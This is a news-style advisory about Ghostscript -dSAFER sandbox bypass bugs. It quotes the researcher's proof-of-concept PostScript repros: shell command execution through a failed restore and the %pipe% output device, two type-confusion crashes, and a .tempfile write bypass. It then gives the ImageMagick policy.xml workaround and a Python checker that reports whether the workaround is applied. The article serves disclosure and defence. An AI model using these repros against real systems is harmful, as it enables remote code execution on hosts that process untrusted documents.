Vulnerabilities in Ghostscript can lead to remote code execution

Ghostscript is an interpreter for the Adobe PostScript language and PDF, and it is used by a variety of applications (e.g. ImageMagick, Evince, GIMP, PDF readers, etc.). Recently, Google Project Zero security researcher Tavis Ormandy announced details of newly discovered Ghostscript vulnerabilities.
The researcher has previously found high-risk vulnerabilities in Ghostscript. Last year, he discovered that CVE-2017-8291 had been exploited by hackers to attack cryptocurrency trading platforms. This is the first high-risk Ghostscript vulnerability he has discovered this year.
The following is a brief introduction to the vulnerabilities:

1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

2. setcolor claims no operand checking is necessary, because it’s hidden behind a pseudo-operator of the same name. That’s true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /Whatever 16#414141414141 >> setpattern
Segmentation fault

3. The LockDistillerParams boolean isn’t type checked, so nice easy type confusion. Repro:

$ gs -q -sDEVICE=ppmraw -dSAFER
GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams
Segmentation fault

4. .tempfile permissions don’t seem to work, I don’t know when they broke. You’re not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn’t seem to work for me e.g.:

$ strace -fefile gs -sDEVICE=ppmraw -dSAFER

GS>(/proc/self/cwd/hello) (w) .tempfile
open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
GS<2>dup
GS<3>(hello) writestring
GS<2>closefile

CERT/CC issued a security advisory describing the issue as a “-dSAFER sandbox bypass vulnerability”. The temporary solution is to disable the PostScript, EPS, PDF, and XPS decoders in the ImageMagick policy.xml:
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
<policy domain="coder" rights="none" pattern="XPS" />
Currently, Artifex Software, ImageMagick, Red Hat, and Ubuntu are affected by this vulnerability; CoreOS has announced that it is not affected.
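
To confirm that a deployed policy.xml really applies the workaround above, the following added example (not code from CERT/CC, ImageMagick, or the original report) parses a policy file and reports the state of the four coders. The function names and the sample policy are constructed for illustration; it assumes case-sensitive glob matching and, to stay conservative, treats any matching rule that grants rights as leaving the coder enabled, whatever the rule order.

```python
import fnmatch
import re
import xml.etree.ElementTree as ET

# Coders the advisory quoted above says to disable.
GHOSTSCRIPT_CODERS = ("PS", "EPS", "PDF", "XPS")

# Constructed sample: PDF rule is commented out, XPS is re-enabled by a later rule.
SAMPLE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="{EPS,XPS}" />
  <!-- <policy domain="coder" rights="none" pattern="PDF" /> -->
  <policy domain="coder" rights="read" pattern="XPS" />
</policymap>"""


def expand_braces(pattern):
    """Expand {a,b,c} groups, which fnmatch does not understand."""
    m = re.search(r"\{([^{}]*)\}", pattern)
    if not m:
        return [pattern]
    head, tail = pattern[:m.start()], pattern[m.end():]
    return [g for alt in m.group(1).split(",")
            for g in expand_braces(head + alt + tail)]


def coder_status(policy_xml):
    """Return {coder: 'blocked' | 'allowed' | 'no-rule'} for each coder."""
    root = ET.fromstring(policy_xml)  # XML comments are skipped by the parser
    status = {}
    for coder in GHOSTSCRIPT_CODERS:
        rights_seen = []
        for pol in root.iter("policy"):
            if pol.get("domain", "").lower() != "coder":
                continue
            globs = expand_braces(pol.get("pattern", ""))
            if any(fnmatch.fnmatchcase(coder, g) for g in globs):
                rights_seen.append(pol.get("rights", "").strip().lower())
        # Assumption: a coder counts as blocked only when every matching
        # rule says rights="none"; one granting rule marks it allowed.
        if not rights_seen:
            status[coder] = "no-rule"
        elif all(r == "none" for r in rights_seen):
            status[coder] = "blocked"
        else:
            status[coder] = "allowed"
    return status

if __name__ == "__main__":
    print(coder_status(SAMPLE_POLICY))
```

Any coder reported as anything other than blocked still needs one of the policy lines shown above.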